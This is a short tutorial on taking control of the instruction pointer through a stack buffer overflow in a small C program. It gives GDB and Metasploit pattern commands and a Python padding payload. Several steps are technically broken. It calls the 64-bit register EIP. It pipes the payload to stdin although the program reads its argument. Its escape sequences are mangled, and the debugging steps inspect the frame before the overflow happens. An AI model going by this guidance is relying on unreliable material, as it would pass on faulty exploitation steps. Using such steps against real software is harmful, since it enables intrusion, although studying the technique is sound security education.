EIP Control in 64-bit Stack Overflow

TL;DR

This guide shows how to overwrite the EIP register on a 64-bit system using a stack overflow vulnerability, inserting ’00’ into the EIP to redirect execution. This is a basic exploitation technique for gaining control of program flow.

Prerequisites

• A vulnerable program (example provided below).
• A debugger like GDB or pwndbg.
• Basic understanding of assembly language and the stack.

Vulnerable Program Example (C)

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
  char buffer[64];
  if (argc > 1) {
    strcpy(buffer, argv[1]);
    printf("Buffer: %sn", buffer);
  }
  return 0;
}

Steps

1. Compile the program: Compile with debugging symbols enabled.

   gcc -g vulnerable.c -o vulnerable
   

2. Identify the Stack Overflow: Run the program and provide an input string longer than 64 characters. This will overflow the buffer, overwriting adjacent memory on the stack.
3. Find the EIP Offset: Use a debugger to determine how many bytes you need to send before overwriting the EIP register.
   • Start the program in GDB:

     gdb vulnerable
     

   • Set a breakpoint after the strcpy call.

     break main
     

   • Run the program with a pattern (e.g., using msf-pattern_create from Metasploit).

     run $(msf-pattern_create 100)
     

   • When the breakpoint is hit, examine the stack to find where EIP has been overwritten with your pattern.

     info frame
     

   • Use the pattern offset finder (e.g., msf-pattern_offset) to determine the exact offset.

     msf-pattern_offset <EIP value from GDB>
     

4. Craft the Payload: Create a payload that overwrites EIP with ’00’ (two null bytes). On 64-bit systems, you typically need to overwrite 8 bytes for EIP.

   import sys
   
   payload = b"A" * <offset> + b"x00x00x00x00x00x00x00x00"
   sys.stdout.buffer.write(payload)
   

   Replace <offset> with the offset you found in step 3.

5. Run the Payload: Execute the program with your crafted payload.

   python exploit.py | ./vulnerable
   

6. Verify Control: If successful, the program should crash at address 0x00 (or behave unexpectedly). This indicates that you have overwritten EIP and redirected execution. You can confirm this in GDB by examining the registers after the crash.

   info registers
   

Important Considerations

• Address Space Layout Randomization (ASLR): ASLR randomizes memory addresses, making it harder to predict where code is loaded. You may need to bypass ASLR using techniques like information leaks or Return-Oriented Programming (ROP).
• Stack Canaries: Stack canaries are security mechanisms that detect stack buffer overflows. They must be bypassed before overwriting EIP.
• Non-Executable Stack: If the stack is non-executable, you cannot directly inject and execute code on the stack. ROP is often used in this case.